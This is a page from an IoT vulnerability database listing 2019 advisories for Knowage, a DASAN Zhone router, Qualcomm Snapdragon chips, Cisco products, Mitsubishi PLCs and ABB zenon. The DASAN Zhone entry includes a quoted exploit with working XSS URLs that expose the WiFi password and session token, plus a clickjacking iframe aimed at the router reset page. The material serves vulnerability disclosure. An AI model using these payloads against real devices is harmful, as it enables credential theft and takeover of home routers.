VARIoT IoT vulnerabilities database

VAR-201909-0676 CVE-2019-13349 Knowage Vulnerabilities related to certificate and password management CVSS V2: 4.0
CVSS V3: 4.9
Severity: MEDIUM
In Knowage through 6.1.1, an authenticated user that accesses the users page will obtain all user password hashes. Knowage contains vulnerabilities related to certificate and password management. Information may be obtained.
VAR-201909-0690 CVE-2019-13190 Knowage Authentication vulnerability CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
In Knowage through 6.1.1, the sign up page does not invalidate a valid CAPTCHA token. This allows for CAPTCHA bypass in the signup page. Knowage contains an authentication vulnerability. The service may be put into a denial-of-service (DoS) state.
VAR-201909-1467 CVE-2019-10677 DASAN Zhone ZNID GPON 2426A EU Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Multiple Cross-Site Scripting (XSS) issues in the web interface on DASAN Zhone ZNID GPON 2426A EU version S3.1.285 devices allow a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameter: /zhndnsdisplay.cmd (name), /wlsecrefresh.wl (wlWscCfgMethod, wl_wsc_reg). The DASAN Zhone ZNID GPON 2426A EU device contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. DASAN Zhone ZNID GPON 2426A EU is a wireless router from DASAN Korea. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code.
# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677
= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
VAR-201909-1428 CVE-2019-10497 Use-after-free vulnerability in multiple Snapdragon products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
A use-after-free issue occurs if another instance of open for the voice_svc node is called from an application without closing the previous one, in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. Multiple Snapdragon products contain a use-after-free vulnerability. Information may be obtained or altered, and the service may be put into a denial-of-service (DoS) state. Qualcomm MDM9206 and others are products of Qualcomm. MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in Audio in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products.
VAR-201909-1457 CVE-2019-10506 Input validation vulnerability in multiple Snapdragon products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
While processing the QCA_NL80211_VENDOR_SUBCMD_AVOID_FREQUENCY vendor command, the driver does not validate the data obtained from user space, which could be invalid and thus lead to undesired behaviour in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in MDM9206, MDM9607, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDM630, SDM660, SDX24. Multiple Snapdragon products contain an input validation vulnerability. Information may be obtained or altered, and the service may be put into a denial-of-service (DoS) state. Qualcomm MDM9206 and others are products of Qualcomm. MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. An input validation error vulnerability exists in WLAN in several Qualcomm products. The vulnerability stems from the failure of the network system or product to properly validate the input data.
VAR-201909-1458 CVE-2019-10507 Out-of-bounds vulnerability in multiple Snapdragon products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
Lack of a check on extscan change results received from firmware can lead to an out-of-buffer read in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 210/SD 212/SD 205, SD 425, SD 430, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM630, SDM660, SDX20, SDX24. Multiple Snapdragon products contain an out-of-bounds vulnerability. Information may be obtained or altered, and the service may be put into a denial-of-service (DoS) state. Qualcomm MDM9206 and others are products of Qualcomm. MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in WLAN in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc.
VAR-201909-1123 CVE-2019-2284 Use-after-free vulnerability in multiple Snapdragon products CVSS V2: 4.4
CVSS V3: 7.0
Severity: HIGH
Possible use-after-free issue due to a race condition while calling camera ioctl concurrently in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MSM8909W, QCS405, QCS605, Qualcomm 215, SD 425, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 845 / SD 850, SD 855, SDM439, SDX24. Multiple Snapdragon products contain a use-after-free vulnerability. Information may be obtained or altered, and the service may be put into a denial-of-service (DoS) state. SD 712 is a central processing unit (CPU) product. SD 710 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in the Camera in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products.
VAR-201909-0986 CVE-2019-2333 Classic buffer overflow vulnerability in multiple Snapdragon products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
Buffer overflow due to improper validation of buffer size while the IPA driver processes a read operation in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. Multiple Snapdragon products contain a classic buffer overflow vulnerability. Information may be obtained or altered, and the service may be put into a denial-of-service (DoS) state. Qualcomm MDM9607 and others are products of Qualcomm. MDM9607 is a central processing unit (CPU) product. MDM9650 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in the IPA driver in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc.
VAR-201909-0987 CVE-2019-2341 Classic buffer overflow vulnerability in multiple Snapdragon products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
Buffer overflow when the audio buffer size provided by the user is larger than the maximum allowable audio buffer size in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS405, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. Multiple Snapdragon products contain a classic buffer overflow vulnerability. Information may be obtained or altered, and the service may be put into a denial-of-service (DoS) state.
VAR-201909-0985 CVE-2019-1976 Cisco Industrial Network Director Vulnerabilities related to certificate and password management CVSS V2: 5.0
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in the "plug-and-play" services component of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to access sensitive information on an affected device. The vulnerability is due to improper access restrictions on the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to access running configuration information about devices managed by the IND, including administrative credentials. Cisco Industrial Network Director (IND) is an industrial automation management system from Cisco. The system is automated through the visualization of industrial Ethernet infrastructure.
VAR-201909-0206 CVE-2019-12633 Cisco Unified Contact Center Express Input validation vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A vulnerability in Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on a targeted system. The vulnerability is due to improper validation of user-supplied input on the affected system. An attacker could exploit this vulnerability by sending the user of the web application a crafted request. If the request is processed, the attacker could access the system and perform unauthorized actions. This component supports functions such as self-service voice service, call distribution, and customer access control. A code issue vulnerability exists in Cisco Unified CCX releases prior to 11.6(2)ES04 and releases prior to 12.0(1)SU0.1
VAR-201909-0154 CVE-2019-12645 Cisco Jabber Client Framework Input validation vulnerability CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
A vulnerability in Cisco Jabber Client Framework (JCF) for Mac Software, installed as part of the Cisco Jabber for Mac client, could allow an authenticated, local attacker to execute arbitrary code on an affected device. The vulnerability is due to improper file level permissions on an affected device when it is running Cisco JCF for Mac Software. An attacker could exploit this vulnerability by authenticating to the affected device and executing arbitrary code or potentially modifying certain configuration files. A successful exploit could allow the attacker to execute arbitrary code or modify certain configuration files on the device using the privileges of the installed Cisco JCF for Mac Software. Cisco Jabber Client Framework (JCF) contains an input validation vulnerability. Information may be obtained or altered, and the service may be put into a denial-of-service (DoS) state. Cisco Jabber Client Framework (JCF) is a unified communications client framework from Cisco. The framework provides online status display, instant messaging, voice and other functions. An input validation error vulnerability exists in Cisco JCF 12.6(1) and earlier versions based on the Mac platform. The vulnerability is caused by the program assigning incorrect permissions to files.
VAR-201909-0207 CVE-2019-12635 Cisco Content Security Management Appliance Software Authorization vulnerability CVSS V2: 3.5
CVSS V3: 4.3
Severity: MEDIUM
A vulnerability in the authorization module of Cisco Content Security Management Appliance (SMA) Software could allow an authenticated, remote attacker to gain out-of-scope access to email. The vulnerability exists because the affected software does not correctly implement role permission controls. An attacker could exploit this vulnerability by using a custom role with specific permissions. A successful exploit could allow the attacker to access the spam quarantine of other users. This appliance is mainly used to manage all policies, reports, audit information, etc. of email and web security appliances
VAR-201909-0205 CVE-2019-12632 Cisco Finesse Input validation vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A vulnerability in Cisco Finesse could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on an affected system. The vulnerability exists because the affected system does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to a user of the web application. A successful exploit could allow the attacker to access the system and perform unauthorized actions. Cisco Finesse contains an input validation vulnerability. Information may be tampered with. Cisco Finesse is a set of call center management software developed by Cisco.
VAR-201909-0153 CVE-2019-12644 Cisco Identity Services Engine Software Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability exists because the web-based management interface of the affected device does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information
VAR-201909-1561 No CVE Denial of Service Vulnerability in MITSUBISHI PLC (CNVD-2019-30336) CVSS V2: 6.1
CVSS V3: -
Severity: MEDIUM
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric. MITSUBISHI PLC has a denial of service vulnerability that could be exploited by an attacker to cause a denial of service
VAR-201909-1563 No CVE MITSUBISHI PLC has a denial of service vulnerability CVSS V2: 6.1
CVSS V3: -
Severity: MEDIUM
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric. MITSUBISHI PLC has a denial of service vulnerability, which can be exploited by attackers to cause a denial of service.
VAR-201909-1562 No CVE MITSUBISHI PLC has a denial of service vulnerability (CNVD-2019-30335) CVSS V2: 6.1
CVSS V3: -
Severity: MEDIUM
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric. MITSUBISHI PLC has a denial of service vulnerability, which can be exploited by attackers to cause a denial of service.
VAR-201909-1545 No CVE ABB zenon Editor has DLL hijacking vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
The ABB Group ranks among the world's top 500 companies and is headquartered in Zurich, Switzerland, dedicated to providing solutions for customers in the industrial and power industries. ABB zenon Editor has a DLL hijacking vulnerability that can be used by attackers to gain server permissions.
VAR-201911-1433 CVE-2019-2258 Array index validation vulnerability in multiple Snapdragon products CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Improper validation of array index causes OOB write and then leads to memory corruption in MMCP in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9650, MDM9655, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 650/52, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SD 8CX, SDA660, SDM439, SDM630, SDM660, SDX20, Snapdragon_High_Med_2016, SXR1130. Multiple Snapdragon products contain a vulnerability related to array index validation. Information may be obtained or altered, and the service may be put into a denial-of-service (DoS) state. Qualcomm MDM9607 and others are products of Qualcomm. MDM9607 is a central processing unit (CPU) product. Qualcomm MDM9150 is a central processing unit (CPU) product. SDX20 is a modem. MMCP in many Qualcomm products has an input validation error vulnerability. The vulnerability stems from the fact that the network system or product did not correctly verify the input data, and no detailed vulnerability information is currently available.